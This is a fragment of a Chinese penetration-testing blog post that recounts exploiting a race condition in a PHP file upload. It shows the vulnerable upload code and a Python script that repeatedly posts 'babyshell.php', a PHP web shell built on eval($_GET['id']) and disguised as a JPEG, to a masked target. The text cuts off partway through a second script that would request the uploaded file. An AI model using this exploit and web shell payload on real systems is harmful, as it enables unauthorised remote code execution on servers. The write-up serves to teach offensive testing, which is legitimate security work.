专栏名称: HACK学习呀

HACK学习，专注于互联网安全与黑客精神；渗透测试，社会工程学，Python黑客编程，资源分享，Web渗透培训，电脑技巧，渗透技巧等，为广大网络安全爱好者一个交流分享学习的平台！

实战 | 记一次条件竞争文件上传

HACK学习呀 · 公众号 · 黑客 · 2023-04-05 12:55

正文

请到「今天看啥」查看全文

, time()).rand(100, 999). 'test' . $extend ;
$upload = move_uploaded_file( $data [ 'file' ][ 'tmp_name' ], $imgpath );
$imgpath = "../common/" . $imgpath ;

if (! $upload ){
echo ' ' ; exit ;
} else {
.......
针对文件处理的代码
.......
}

这里的思路是利用程序去发包上传,另一边去访问条件竞争从而绕过,这里用 burp 插件把图片上传包导出成 python requests 代码,随便写了一下就没有加多线程

import requests
try:
    url = "http://xxxxxxx/upload.php"
    cookies = {"PHPSESSID": "1gmkmeqdg9sl8i4crprkm25884"}
    headers = {"Cache-Control": "max-age=0", "Sec-Ch-Ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"macOS\"", "Upgrade-Insecure-Requests": "1", "Origin": "", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarym1ogNWdW0fVSBGcm", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe", "Referer": "", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9"}
    data = "------WebKitFormBoundarym1ogNWdW0fVSBGcm\r\nContent-Disposition: form-data; name=\"file\"; filename=\"babyshell.php\"\r\nContent-Type: image/jpeg\r\n\r\n\n@eval($_GET['id']);\r\nfile_put_contents('test.php', '');\r\n\n?>\r\n------WebKitFormBoundarym1ogNWdW0fVSBGcm--\r\n"
    while 1:
        requests.post(url, headers=headers, cookies=cookies, data=data)
except:
    pass

然后在写一个程序去访问

import requests,time,random
while 1:
    time1 = (time